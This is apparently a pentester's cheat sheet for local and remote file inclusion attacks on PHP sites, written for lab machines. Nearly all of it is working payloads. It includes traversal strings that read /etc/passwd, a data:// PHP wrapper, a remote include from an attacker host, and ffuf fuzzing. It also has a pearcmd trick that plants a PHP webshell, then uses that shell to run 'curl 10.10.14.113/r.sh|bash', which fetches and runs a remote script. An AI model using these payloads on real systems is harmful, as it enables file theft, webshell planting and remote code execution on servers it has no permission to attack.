LFI/RFI
Direct file path trasversal
../../../../../../../../etc/passwd
data://text/plain,<?php phpinfo(); ?>
http://atacker.com/mal.php
ffuf -u https://host.htb/?file=FUZZ -w /usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -ic -c -ac -k -H 'Cookie: PHPSESSID=l5l8ad3k06f2h9493eqgtn9ppb'
Dealing with ‘.php’ added to the page name
../../../../../../../../etc/passwd%00
../../../../../../../../usr/local/lib/php/pearcmd
Example for pearcmd
curl --path-as-is 'http://host/?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&<?=`$_GET\[0\]`?>+payload.php'
curl --path-as-is 'http://host/payload.php?0=id'
cat <<'EOF'| tr -d '\n' | python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))" | tr -d '\n'
curl 10.10.14.113/r.sh|bash
EOF
# curl --path-as-is 'http://host/payload.php?0=curl+10.10.14.113%2Fr.sh%7Cbash'